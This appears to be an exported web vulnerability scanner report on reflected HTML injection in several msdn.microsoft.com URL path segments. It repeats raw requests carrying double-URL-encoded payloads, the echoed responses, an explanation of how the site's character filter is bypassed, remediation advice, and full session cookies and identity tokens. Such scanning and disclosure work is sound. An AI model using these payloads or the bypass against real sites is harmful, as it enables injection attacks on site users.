GET /en-us66b35%2522%253e%253ca%253e93ed8ded15d/library/ee702802.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us66b35"><a>93ed8ded15d/library/ee702802" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f19%2522%253e%253ca%253e937c58c4d40 was submitted in the REST URL parameter 2. This input was echoed as a5f19"><a>937c58c4d40 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarya5f19%2522%253e%253ca%253e937c58c4d40/ee702802.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:14 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya5f19"><a>937c58c4d40/ee702802" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc52%2522%253e%253ca%253edf492255170 was submitted in the REST URL parameter 3. This input was echoed as 7cc52"><a>df492255170 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee702802.aspx7cc52%2522%253e%253ca%253edf492255170 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9209 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:29 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ee702802.aspx7cc52"><a>df492255170" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9e1%2522%253e%253ca%253e80d9957f887 was submitted in the REST URL parameter 1. This input was echoed as aa9e1"><a>80d9957f887 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usaa9e1%2522%253e%253ca%253e80d9957f887/library/ee721044.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:36 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usaa9e1"><a>80d9957f887/library/ee721044" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2341c%2522%253e%253ca%253efc838b46606 was submitted in the REST URL parameter 2. This input was echoed as 2341c"><a>fc838b46606 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library2341c%2522%253e%253ca%253efc838b46606/ee721044.aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9199 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library2341c"><a>fc838b46606/ee721044" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0813%2522%253e%253ca%253e5bed963aadc was submitted in the REST URL parameter 3. This input was echoed as a0813"><a>5bed963aadc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ee721044.aspxa0813%2522%253e%253ca%253e5bed963aadc HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
